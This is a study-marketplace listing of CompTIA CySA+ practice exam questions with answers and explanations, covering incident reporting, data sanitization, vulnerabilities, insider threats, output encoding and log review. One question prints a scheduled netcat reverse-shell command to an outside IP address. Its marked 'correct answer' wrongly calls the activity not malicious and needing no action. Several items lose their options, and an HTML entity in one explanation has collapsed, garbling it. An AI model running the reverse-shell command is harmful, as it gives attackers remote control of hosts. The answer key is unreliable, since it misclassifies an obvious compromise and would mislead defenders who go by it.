CompTIA CySA+ (CS0-003) Practice Exam #3 Questions and Answers.
0 view 0 purchase
Course
CompTIA CySA+
Institution
CompTIA CySA+
CompTIACySA+ (CS0-003)PracticeExam #3 Questions
and Answers.
In the aftermath of a ransomware attack at your company, you as the incident response
manager have been asked to present a report to the executive team. They are
particularly interested in a detailed analysis of how the attack happene...
CompTIA CySA+ (CS0-003) Practice Exam #3 Questions
and Answers.
In the aftermath of a ransomware attack at your company, you as the incident response
manager have been asked to present a report to the executive team. They are
particularly interested in a detailed analysis of how the attack happened and the key
areas that allowed for it to occur. What part of your report should you focus on?
Executive summary
Scope
Recommendations
Root cause analysis - Correct Answer Root cause analysis
A root cause analysis provides a deep dive into what allowed the incident to occur,
helping to identify vulnerabilities and procedural shortcomings. The scope section
typically outlines what systems and data were impacted by the incident, not the reasons
behind it. While the recommendations section provides guidance on future action, it does
not typically contain a detailed analysis of how the incident occurred. While the executive
summary provides a high-level overview of the incident, it does not typically delve into a
detailed analysis of the root causes.
What sanitization technique uses only logical techniques to remove data, such as
overwriting a hard drive with a random series of ones and zeroes?
Clear applies logical techniques to sanitize data in all user-addressable storage locations
for protection against simple non-invasive data recovery techniques. Clearing involves
overwriting data once (and seldom more than three times) with repetitive data (such as all
zeros) or resetting a device to factory settings. Purging data is meant to eliminate
information from being feasibly recovered even in a laboratory environment. Destroy
requires physical destruction of the media, such as pulverization, melting, incineration,
and disintegration. Degaussing is the process of decreasing or eliminating a remnant
magnetic field. Degaussing is an effective method of sanitization for magnetic media,
such as hard drives and floppy disks.
,In a network vulnerability assessment report, several zero-day and critical vulnerabilities
were discovered. Why might this necessitate immediate action?
Because they signal a need to decrease the frequency of vulnerability assessments
These vulnerabilities present significant risk due to no current security fix being available
Because they indicate a need to hire more staff
Because zero-day and critical vulnerabilities improve the system's performance - Correct
Answer These vulnerabilities present significant risk due to no current security fix being
available
Zero-day and critical vulnerabilities are high-risk issues that can severely compromise a
system's security. One example of a zero-day virus that caused significant havoc is the
"WannaCry" ransomware. It exploited a vulnerability in the Windows operating system,
spreading rapidly across networks and encrypting files, demanding ransom payments in
exchange for decryption. These types of vulnerabilities are significant threats, not
performance enhancers. While additional resources might be needed for vulnerability
management, the presence of critical vulnerabilities doesn't directly indicate staffing
needs. On the contrary, critical vulnerabilities might suggest a need for more frequent
and thorough assessments.
You are a security investigator at a high-security installation which houses significant
amounts of valuable intellectual property. You are investigating the utilization of George's
credentials and are trying to determine if his credentials were compromised or if he is an
insider threat. In the break room, you overhear George telling a coworker that he believes
he is the target of an ongoing investigation. Which of the following step in the preparation
phase of the incident response was likely missed?
Creating a call list or escalation list
Conduct background screenings on all applicants
Developing a proper incident response form
Development of a communication plan - Correct Answer Development of a
communication plan
,An established and agreed upon communication plan, which may also include a non-
disclosure agreement, should be put in place to prevent the targets of an ongoing insider
threat investigations from becoming aware of it. Even if it was later determined that
George was innocent, the knowledge that he was being investigated could be damaging
to both him and the company. If he was an insider threat who now suspects he is under
investigation, he could take steps to cover his tracks or conduct destructive action. While
background screenings may prevent some people from becoming insiders, it would not
prevent the unauthorized disclosure of information concerning the investigation. A call
list/escalation list will help manage this kind of problem and keep the right people
informed, but it will not explicitly deal with the issue of inadvertent disclosure. Similarly, a
proper incident response form may include guidance for communication but would have
been orchestrated as part of a larger communications plan that detailed the proper
channels to use.
Which of the following secure coding best practices ensures a character like < is
translated into the < string when writing to an HTML page?
Output encoding involves translating special characters into some different but
equivalent form that is no longer dangerous in the target interpreter, for example,
translating the < character into the < string when writing to an HTML page. Input
validation is performed to ensure only properly formed data is entering the workflow in an
information system, preventing malformed data from persisting in the database and
triggering the malfunction of various downstream components. Improper error handling
can introduce various security problems where detailed internal error messages such as
stack traces, database dumps, and error codes are displayed to an attacker. The session
management implementation defines the exchange mechanism that will be used
between the user and the web application to share and continuously exchange the
session ID.
You have just begun an investigation by reviewing the security logs. During the log
review, you notice the following lines of code:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
, sc config schedule start auto
net start schedule
at 10:42 ""c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe ""
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What BEST describes what is occurring and what action do you recommend to stop it?
The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto
cron job remotely; No recommendation is required since this is not malicious activity
The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp
directory to create a remote connection to 123.12.34.12; you should recommend
removing the host from the network
The host (123.12.34.12) is a rogue device on the network; you should recommend
removing the host from the network
The host is beaconing to 123.12.34 - Correct Answer The host (123.12.34.12) is running
nc.exe from the temp directory at 10:42 using the auto cron job remotely; No
recommendation is required since this is not malicious activity
You are investigating a suspected compromise. You have noticed several files that you
don't recognize. How can you quickly and effectively check if the files have been infected
with malware?
Run the Strings tool against each file to identify common malware identifiers
Disassemble the files and conduct static analysis on them using IDA Pro
Submit the files to an open-source intelligence provider like VirusTotal
Scan the files using a local anti-virus/anti-malware engine - Correct Answer Submit the
files to an open-source intelligence provider like VirusTotal
The best option is to submit them to an open-source intelligence provider like VirusTotal.
VirusTotal allows you to quickly analyze suspicious files and URLs to detect types of
malware. It then automatically shares them with the security community, as well.
The benefits of buying summaries with Stuvia:
Guaranteed quality through customer reviews
Stuvia customers have reviewed more than 700,000 summaries. This how you know that you are buying the best documents.
Quick and easy check-out
You can quickly pay through credit card or Stuvia-credit for the summaries. There is no membership needed.
Focus on what matters
Your fellow students write the study notes themselves, which is why the documents are always reliable and up-to-date. This ensures you quickly get to the core!
Frequently asked questions
What do I get when I buy this document?
You get a PDF, available immediately after your purchase. The purchased document is accessible anytime, anywhere and indefinitely through your profile.
Satisfaction guarantee: how does it work?
Our satisfaction guarantee ensures that you always find a study document that suits you well. You fill out a form, and our customer service team takes care of the rest.
Who am I buying these notes from?
Stuvia is a marketplace, so you are not buying this document from us, but from seller Lectjosh. Stuvia facilitates payment to the seller.
Will I be stuck with a subscription?
No, you only buy these notes for $18.49. You're not tied to anything after your purchase.
